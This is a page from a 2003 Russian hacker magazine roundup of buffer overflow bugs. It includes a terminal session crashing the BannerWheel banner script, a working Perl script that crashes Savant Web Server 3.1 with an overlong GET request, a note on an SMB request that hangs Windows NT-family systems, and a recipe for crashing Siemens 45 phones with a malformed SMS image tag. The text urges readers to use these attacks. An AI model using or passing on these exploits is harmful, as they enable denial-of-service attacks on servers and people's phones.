Издательский дом ООО "Гейм Лэнд"СПЕЦВЫПУСК ЖУРНАЛА ХАКЕР #32, ИЮЛЬ 2003 г.

ПЫШНЫЕ БУФЕРА:

Vint(vint@townnet.ru)

Спецвыпуск Xakep, номер #032, стр. 032-080-3


ОБВАЛ БАННЕРОВ

А сейчас пополним буферок в юнихе: BannerWheel (бесплатный сценарий для показа баннеров для UNIX систем). Вот так его можно вырубить:

[vint@signal-11 ~/hack/idea]$ gcc badmin. c -o badmin. cgi -lcrypt [vint@signal-11 ~/hack/idea]$ . /badmin

bwe(input): "command" ? kill. the. turkey

bwe(input): "rcmd" ? ААА(300 раз)Segmentation fault

[vint@signal-11 ~/hack/idea]$

Все! Буфер полон, со всеми вытекающими.

БАГ НА ХАЛЯВУ

Вот дыра во фришном web-сервере с открытым исходным кодом Savant для 9x, ME, NT, 2000-х и ХРеновых виндов. Там нашли переполнение буферка и написали експлоит:

#!/usr/bin/perl

use IO::Socket;

$host=$ARGV[0];

$port=$ARGV[1];

$a=A; if(! $ARGV[0]) {&usage; exit;}

$dosme = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => 'tcp');

$evilc0de = $a x 300;

print $dosme "GET /$evilc0de ";

sleep(3);

close($dosme);

print "Daemon should now be crashed";

sub usage() { print "USAGE: perl $0"; print "Savant Web Server 3.1 Buffer Overflow"; exit(0); }

Более подробно на http://soldierx.com.

ВИСЯК НА ОБЩАК

Нашли дырку и в SMB (Server Message Block) - протоколе, который мелкомягкие использует для организации общего доступа к файлам, принтерам, последовательным портам, а также для связи межу компьютерами с использованием именованных каналов и почтовых слотов. Клиент делает SMB запрос о ресурсе, и сервер отвечает клиенту SMB пакетом, используя request/response протокол.

Специально обработанный SMB запрос может привести к зависанию системы. Для выполнения сей атаки тебе можно иметь лишь анонимную учетную запись! Уязвимость может использоваться для выполнения произвольного кода. Дыра найдена в Windows NT 4.0 Workstation, Windows NT 4.0 Server, Windows 2000 Professional, Windows 2000 Server, Windows 2000 Advanced Server, XP Professional. То есть валятся все NT'шные ОСы. Эксплоит ищи на секьюритизоне. Его пока там нет, но обещают!

ЧИСТА БОНУС :)

И напоследок чисто фрикерское переполнение буфера в сотовике Siemens серии 45.

Чуток теории: для вставки в сообщение картинки используется такая конструкция: "%IMG_NAME", вот тут-то и кроется глюк на переполнение. 157 точек, поставленные в теге, указывающем на картинку, будут служить причиной переполнения буфера в телефончике. После получения сего злостного послания телефон моментально вырубается с каким-то странным пуканьем. Когда ты его включишь, он будет работать как всегда, но зайти в Message->Inbox тебе будет очень проблематично. Решение сего трабла есть только одно - ждать, пока разработчики выпустят новую версию прошивки, и тогда закачать ее в телефон.

Назад на стр. 032-080-2  Содержание  Вперед на стр. 032-080-4